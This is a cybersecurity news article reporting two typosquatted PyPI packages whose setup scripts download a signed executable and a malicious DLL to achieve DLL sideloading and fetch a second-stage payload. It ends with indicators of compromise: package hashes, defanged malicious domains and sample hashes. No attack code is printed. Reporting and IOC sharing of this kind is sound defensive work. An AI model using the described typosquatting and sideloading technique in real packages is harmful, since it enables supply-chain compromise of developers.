Tuesday, November 12, 2024
HomeCyber Security NewsNew Malicious PyPI Packages Use DLL Sideloading In A Supply Chain Attack

New Malicious PyPI Packages Use DLL Sideloading In A Supply Chain Attack

Published on

Malware protection

Researchers have discovered that threat actors have been using open-source platforms and codes for several purposes, such as hosting C2 infrastructure, storing stolen data, and delivering second and third-stage downloaders or rootkit programs.

Two open-source PyPI packages were discovered to be utilized by threat actors for executing code via DLL sideloading attacks as a means of evading security monitoring tools.

The packages were identified as NP6HelperHttptest and NP6HelperHttper. 

- Advertisement - SIEM as a Service

Malicious PyPI Packages

According to the reports shared with Cyber Security News, open-source ecosystems are most widely used by almost every developer, which does not have a reputation provider to assess the quality and reliability of the code.

Thus making it extremely simple and easier for threat actors to insert malicious codes into the repositories and perform supply chain attacks.

In addition to this, researchers discovered two attack types that are used in software supply chain attacks, namely typosquatting and repojacking.

The two malicious PyPI packages were involved in the Typosquatting attacks as the package names are identical to one of the legitimate NP6 packages.

Malware infection stages (Source: Reversing Labs)

Developers mostly ignore the spelling and consider the packages legitimate, proceeding to use them in development.

Once this is done, threat actors can pivot their ways into the organizations and perform malicious activities.

Malicious Script Abusing DLL Sideloading

Both of the malicious PyPI packages consisted of a setup.py script that extends the setup tools command for downloading two other files: Comserver.exe and dgdeskband64.dll.

Comserver.exe is a legitimate file signed with a valid certificate from Beijing-based Kingsoft Corp, while dgdeskband64.dll is a malicious file that downloads further and runs a second-stage payload.

Setup.py file (Source: Reversing Labs)

The Comserver.exe has the purpose of loading a library, dgdeskband64.dll, for invoking its exported function Dllinstall.

However, the dgdeskband64.dll malicious file inside the package is not the legitimate one expected from comserver.exe. 

Different exports for the legit and malicious dll (Source: Reversing Labs)

This custom-built dgdeskband64.dll by threat actors does the same Dllinstall export function under the disguise of the legitimate Dgdeskband64.dll library, resulting in a DLL sideloading attack.

This is done as a means of avoiding detection of the malicious code. 

Moreover, execution of the malicious code is achieved by registering an exception handler inside the Dllinstall export function.

A second sample was also found, but it does not exploit DriverGenius’ ComServer.exe; instead, it uses a .exe and target DLL, windowsaccessbridge-64.dll. 

However, the functionality of both the samples is similar, and the same URL downloads the same payload as the other PyPI packages.

Indicators Of Compromise

PyPI Packages

package_nameversionSHA1
NP6HelperHttptest0.11fc236e94b54d3ddc4b2afb8d44a19abd7cf0dd4
NP6HelperHttptest0.2dfc8afe5cb7377380908064551c9555719fd28e3
NP6HelperHttptest0.373ece3d738777e791035e9c0c94bf4931baf3e3a
NP6HelperHttptest0.4e3a7098e3352fdbb5ff5991e9e10dcf3b43b1b86
NP6HelperHttptest0.5575bcc28998ad388c2ad2c2ebc74ba583f5c0065
NP6HelperHttptest0.6a1bb4531ce800515afa1357b633c73c27fa305cf
NP6HelperHttper0.1a65bce340366f724d444978dcdcd877fa2cacb1c

Additional Indicators:

descriptionURI
Domain that’s hosting the malicious dllhttps://fus.rngupdatem[.]buzz
Domain that’s hosting the shellcode payloadUs.archive-ubuntu.top
nametypeSHA1
dgdeskband.dllPE/dll1f9fcf86a56394a7267d85ba76c1256d12e3e76b
windowsaccessbridge-64.dllPE/dll84c75536b279a85a5320f058514b884a016bc8c8
an.gifshellcode2dc80f45540d0a3ea33830848fcf529f98ea2f5e

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are extremely harmful, can wreak havoc, and damage your network.

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

10 Best DNS Management Tools – 2025

Best DNS Management Tools play a crucial role in efficiently managing domain names and...

Sweet Security Announces Availability of its Cloud Native Detection & Response Platform on the AWS Marketplace

Customers can now easily integrate Sweet’s runtime detection and response platform into their AWS...

Researchers Detailed Credential Abuse Cycle

Cybercriminals exploit leaked credentials, obtained through various means, to compromise systems and data, enabling...

New Android Malware SpyAgent Taking Screenshots Of User’s Devices

SpyAgent, a newly discovered Android malware, leverages OCR technology to extract cryptocurrency recovery phrases...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Researchers Detailed Credential Abuse Cycle

Cybercriminals exploit leaked credentials, obtained through various means, to compromise systems and data, enabling...

New Android Malware SpyAgent Taking Screenshots Of User’s Devices

SpyAgent, a newly discovered Android malware, leverages OCR technology to extract cryptocurrency recovery phrases...

Tor Network Suffers IP Spoofing Attack Via Non-Exit Relays

In late October 2024, a coordinated IP spoofing attack targeted the Tor network, prompting...